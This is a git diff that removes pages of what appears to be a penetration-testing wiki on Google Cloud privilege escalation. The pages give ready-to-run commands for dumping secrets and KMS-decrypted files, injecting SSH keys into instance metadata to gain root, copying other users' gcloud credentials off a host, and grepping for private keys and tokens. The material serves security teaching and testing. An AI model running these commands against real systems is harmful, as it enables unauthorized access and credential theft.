-If you own a user that has the **`setIamPolicy`** permission on a resource, you can **escalate privileges on that resource**, because you will be able to change its IAM policy and give yourself more privileges over it.
-
-* _cloudfunctions.functions.setIamPolicy_
- * Modify the policy of a Cloud Function to allow yourself to invoke it.
-
-There are tens of resource types with this kind of permission; you can find all of them in [https://cloud.google.com/iam/docs/permissions-reference](https://cloud.google.com/iam/docs/permissions-reference) by searching for setIamPolicy.
-
-An **example** of privilege escalation abusing .setIamPolicy (in this case in a bucket) can be found here:
-
-{% content-ref url="../gcp-buckets-brute-force-and-privilege-escalation.md" %}
-[gcp-buckets-brute-force-and-privilege-escalation.md](../gcp-buckets-brute-force-and-privilege-escalation.md)
-{% endcontent-ref %}
-
-# Generic Interesting Permissions
-
-## \*.create, \*.update
-
-These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating an existing one**. These kinds of permissions are especially useful if you also have the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can have a service account attached.
-
-## \*ServiceAccount\*
-
-This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case.
-
-# References
-
-* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
-* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
-
diff --git a/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md b/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md
deleted file mode 100644
index f79ceab6a..000000000
--- a/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md
+++ /dev/null
@@ -1,76 +0,0 @@
-# Crypto Keys
-
-[Cloud Key Management Service](https://cloud.google.com/kms/docs/) is a repository for storing cryptographic keys, such as those used to **encrypt and decrypt sensitive files**. Individual keys are stored in key rings, and granular permissions can be applied at either level.
-
-If you have **permission to list the keys**, this is how you can access them:
-
-```bash
-# List the global keyrings available
-gcloud kms keyrings list --location global
-
-# List the keys inside a keyring
-gcloud kms keys list --keyring [KEYRING NAME] --location global
-
-# Decrypt a file using one of your keys
-gcloud kms decrypt --ciphertext-file=[INFILE] \
- --plaintext-file=[OUTFILE] \
- --key [KEY] \
- --keyring [KEYRING] \
- --location global
-```
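-
-Keyrings don't have to live in the `global` location; a minimal sketch to sweep every location instead:
-
-```bash
-# Enumerate keyrings in every available KMS location
-for loc in $(gcloud kms locations list --format="value(locationId)"); do
-  gcloud kms keyrings list --location "$loc"
-done
-```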
-
-# Secrets Management
-
-Google [Secrets Management](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, and other sensitive data. As of this writing, it is currently in beta.
-
-```bash
-# First, list the entries
-gcloud beta secrets list
-
-# Then, pull the clear-text of any secret
-gcloud beta secrets versions access 1 --secret="[SECRET NAME]"
-```
-
-Note that changing a secret entry will create a new version, so it's worth changing the `1` in the command above to a `2` and so on.
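-
-Rather than guessing version numbers, you can enumerate and dump them all (a minimal sketch):
-
-```bash
-# List every version of a secret and access each one
-for v in $(gcloud beta secrets versions list "[SECRET NAME]" --format="value(name.basename())"); do
-  echo "=== version $v ==="
-  gcloud beta secrets versions access "$v" --secret="[SECRET NAME]"
-done
-```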
-
-# References
-
-* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
-
diff --git a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md
deleted file mode 100644
index be89b20b9..000000000
--- a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md
+++ /dev/null
@@ -1,291 +0,0 @@
-In this scenario we are going to suppose that you **have compromised a non-privileged account** inside a VM in a Compute Engine project.
-
-Amazingly, the GCP permissions of the Compute Engine instance you have compromised may help you to **escalate privileges locally inside the machine**. Even if that won't always be very helpful in a cloud environment, it's good to know it's possible.
-
-# OS Patching
-
-If the service account you have access to holds either the `osconfig.patchDeployments.create` or the `osconfig.patchJobs.exec` permission, you can create a [patch job or deployment](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This enables you to move laterally in the environment and gain code execution on all the compute instances within a project.
-
-First, list the available roles:
-
-`gcloud iam roles list`
-
-Now check the permissions offered by each role; if one includes either the patch deployment or patch job permission, continue.
-
-`gcloud iam roles describe roles/ | grep -E '(osconfig.patchDeployments.create|osconfig.patchJobs.exec)'`
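-
-Note that `gcloud iam roles list` shows role definitions rather than your bindings; a sketch to see which roles are actually bound to your service account (the project ID and email are placeholders):
-
-```bash
-# List the roles granted to your service account in the project
-gcloud projects get-iam-policy [PROJECT_ID] \
-    --flatten="bindings[].members" \
-    --filter="bindings.members:serviceAccount:[SA_EMAIL]" \
-    --format="value(bindings.role)"
-```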
-
-
-If you want to manually exploit this you will need to create either a [patch job](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json) or a [deployment](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json). To run a patch job:
-
-`gcloud compute os-config patch-jobs execute --file=patch.json`
-
-
-To create a patch deployment:
-
-`gcloud compute os-config patch-deployments create my-update --file=patch.json`
-
-Automated tooling such as [patchy](https://github.com/rek7/patchy) exists to detect lax permissions and automatically move laterally.
-
-# Read the scripts
-
-**Compute Instances** are probably there to **execute some scripts** that perform actions with their service accounts.
-
-As IAM is so granular, an account may have **read/write** privileges over a resource but **no list privileges**.
-
-A great hypothetical example of this is a Compute Instance that has permission to read/write backups to a storage bucket called `instance82736-long-term-xyz-archive-0332893`.
-
-Running `gsutil ls` from the command line returns nothing, as the service account lacks the `storage.buckets.list` IAM permission. However, if you run `gsutil ls gs://instance82736-long-term-xyz-archive-0332893` you may find a complete filesystem backup, giving you clear-text access to data that your local Linux account lacks.
-
-You may be able to find this bucket name inside a script (in bash, Python, Ruby...).
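-
-A quick way to hunt for hardcoded bucket names on the box (a minimal sketch; the search paths are assumptions):
-
-```bash
-# Grep common script locations for bucket references
-grep -rE "gs://[a-zA-Z0-9._-]+" /opt /srv /etc /home 2>/dev/null
-```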
-
-# Custom Metadata
-
-Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts.
-
-```bash
-# view project metadata
-curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \
- -H "Metadata-Flavor: Google"
-
-# view instance metadata
-curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \
- -H "Metadata-Flavor: Google"
-```
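-
-Individual attributes can also be fetched directly; for example, the commonly present (but not guaranteed) `startup-script` key:
-
-```bash
-# Pull the instance startup script, which often contains credentials
-curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script" \
-  -H "Metadata-Flavor: Google"
-```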
-
-# Modifying the metadata
-
-If you can **modify the instance's metadata**, there are numerous ways to escalate privileges locally. There are a few scenarios that can lead to a service account with this permission:
-
-_**Default service account**_\
-If the service account access **scope** is set to **full access** or at least is explicitly allowing **access to the compute API**, then this configuration is **vulnerable** to escalation. The **default** **scope** is **not** **vulnerable**.
-
-_**Custom service account**_\
-When using a custom service account, **one** of the following IAM permissions **is** **necessary** to escalate privileges:
-
-* `compute.instances.setMetadata` (to affect a single instance)
-* `compute.projects.setCommonInstanceMetadata` (to affect all instances in the project)
-
-Although Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#associating\_a\_service\_account\_to\_an\_instance) not using access scopes for custom service accounts, it is still possible to do so. You'll need one of the following **access scopes**:
-
-* `https://www.googleapis.com/auth/compute`
-* `https://www.googleapis.com/auth/cloud-platform`
-
-## **Add SSH keys to custom metadata**
-
-**Linux** **systems** on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which **periodically** **queries** the instance metadata endpoint for **changes to the authorized SSH public keys**.
-
-**If a new public** key is encountered, it will be processed and **added to the local machine**. Depending on the format of the key, it will either be added to the `~/.ssh/authorized_keys` file of an **existing user or will create a new user with `sudo` rights**.
-
-So, if you can **modify custom instance metadata** with your service account, you can **escalate** to root on the local system by **gaining SSH rights** to a privileged account. If you can modify **custom project metadata**, you can **escalate** to root on **any system in the current GCP project** that is running the accounts daemon.
-
-## **Add SSH key to existing privileged user**
-
-Let's start by adding our own key to an existing account, as that will probably make the least noise.
-
-**Check the instance for existing SSH keys**. Pick one of these users as they are likely to have sudo rights.
-
-```bash
-gcloud compute instances describe [INSTANCE] --zone [ZONE]
-```
-
-Look for a section like the following:
-
-```
- ...
- metadata:
- fingerprint: QCZfVTIlKgs=
- items:
- ...
- - key: ssh-keys
- value: |-
- alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice
- bob:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4vRQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbhaHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob
- ...
-```
-
-Notice the **slightly odd format** of the public keys - the **username** is listed at the **beginning** (followed by a colon) and then again at the **end**. We'll need to match this format. Unlike normal SSH key operation, the username absolutely matters!
-
-**Save the lines with usernames and keys in a new text** file called `meta.txt`.
-
-Let's assume we are targeting the user `alice` from above. We'll **generate a new key** for ourselves like this:
-
-```bash
-ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub
-```
-
-Add your new public key to the file `meta.txt` imitating the format:
-
-```
-alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice
-bob:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4vRQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbhaHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob
-alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnthNXHxi31LX8PlsGdIF/wlWmI0fPzuMrv7Z6rqNNgDYOuOFTpM1Sx/vfvezJNY+bonAPhJGTRCwAwytXIcW6JoeX5NEJsvEVSAwB1scOSCEAMefl0FyIZ3ZtlcsQ++LpNszzErreckik3aR+7LsA2TCVBjdlPuxh4mvWBhsJAjYS7ojrEAtQsJ0mBSd20yHxZNuh7qqG0JTzJac7n8S5eDacFGWCxQwPnuINeGoacTQ+MWHlbsYbhxnumWRvRiEm7+WOg2vPgwVpMp4sgz0q5r7n/l7YClvh/qfVquQ6bFdpkVaZmkXoaO74Op2Sd7C+MBDITDNZPpXIlZOf4OLb alice
-```
-
-Now, you can **re-write the SSH key metadata** for your instance with the following command:
-
-```bash
-gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt
-```
-
-You can now **access a shell in the context of `alice`** as follows:
-
-```
-lowpriv@instance:~$ ssh -i ./key alice@localhost
-alice@instance:~$ sudo id
-uid=0(root) gid=0(root) groups=0(root)
-```
-
-## **Create a new privileged user and add a SSH key**
-
-No existing keys found when following the steps above? No one else interesting in `/etc/passwd` to target?
-
-You can **follow the same process** as above, but just **make up a new username**. This user will be created automatically and given rights to `sudo`. Scripted, the process would look like this:
-
-```bash
-# define the new account username
-NEWUSER="definitelynotahacker"
-
-# create a key
-ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P ""
-
-# create the input meta file
-NEWKEY="$(cat ./key.pub)"
-echo "$NEWUSER:$NEWKEY" > ./meta.txt
-
-# update the instance metadata
-gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt
-
-# ssh to the new account
-ssh -i ./key "$NEWUSER"@localhost
-```
-
-## **Grant sudo to existing session**
-
-This one is so easy, quick, and dirty that it feels wrong…
-
-```
-gcloud compute ssh [INSTANCE NAME]
-```
-
-This will **generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group**, then start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods.
-
-## SSH keys at project level
-
-Following the details mentioned in the previous section you can try to compromise more VMs.
-
-We can expand upon those a bit by [**applying SSH keys at the project level**](https://cloud.google.com/compute/docs/instances/adding-removing-ssh-keys#project-wide), granting you permission to **SSH into a privileged account** for any instance that has not explicitly chosen the "Block project-wide SSH keys" option:
-
-```
-gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
-```
-
-If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes.
-
-# **Using OS Login**
-
-[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
-
-OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.
-
-OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`.
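-
-For example, enabling OS Login on a single instance looks like this (the instance and zone are placeholders):
-
-```bash
-# Enable OS Login at the instance level via metadata
-gcloud compute instances add-metadata [INSTANCE] --zone [ZONE] \
-    --metadata enable-oslogin=TRUE
-```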
-
-The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level:
-
-* **compute.instances.osLogin** (no sudo)
-* **compute.instances.osAdminLogin** (has sudo)
-
-Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted.
-
-If your service account has these permissions, **you can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced for **user accounts**, so it should not slow you down even if it is enabled as shown above.
-
-Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
-
-# Search for Keys in the filesystem
-
-It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to search their home directories for these credentials.
-
-First, find what `gcloud` config directories exist in users' home folders.
-
-```
-sudo find / -name "gcloud"
-```
-
-You can manually inspect the files inside, but these are generally the ones with the secrets:
-
-* \~/.config/gcloud/credentials.db
-* \~/.config/gcloud/legacy\_credentials/\[ACCOUNT]/adc.json
-* \~/.config/gcloud/legacy\_credentials/\[ACCOUNT]/.boto
-* \~/.credentials.json
-
-Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you.
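-
-A minimal sketch of the copy-and-reuse approach (the victim path is an assumption):
-
-```bash
-# On the victim: pack up another user's gcloud config (requires root)
-sudo tar czf /tmp/gcloud-creds.tar.gz /home/victim/.config/gcloud
-
-# On your own machine: drop it into your config dir and list the accounts
-tar xzf gcloud-creds.tar.gz
-cp -r home/victim/.config/gcloud ~/.config/
-gcloud auth list
-```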
-
-## More API Keys regexes
-
-```bash
-TARGET_DIR="/path/to/whatever"
-
-# Service account keys
-grep -Pzr "(?s){[^{}]*?service_account[^{}]*?private_key.*?}" \
- "$TARGET_DIR"
-
-# Legacy GCP creds
-grep -Pzr "(?s){[^{}]*?client_id[^{}]*?client_secret.*?}" \
- "$TARGET_DIR"
-
-# Google API keys
-grep -Pr "AIza[a-zA-Z0-9\\-_]{35}" \
- "$TARGET_DIR"
-
-# Google OAuth tokens
-grep -Pr "ya29\.[a-zA-Z0-9_-]{100,200}" \
- "$TARGET_DIR"
-
-# Generic SSH keys
-grep -Pzr "(?s)-----BEGIN[ A-Z]*?PRIVATE KEY[a-zA-Z0-9/\+=\n-]*?END[ A-Z]*?PRIVATE KEY-----" \
- "$TARGET_DIR"
-
-# Signed storage URLs
-grep -Pir "storage.googleapis.com.*?Goog-Signature=[a-f0-9]+" \
- "$TARGET_DIR"
-
-# Signed policy documents in HTML
-grep -Pzr '(?s)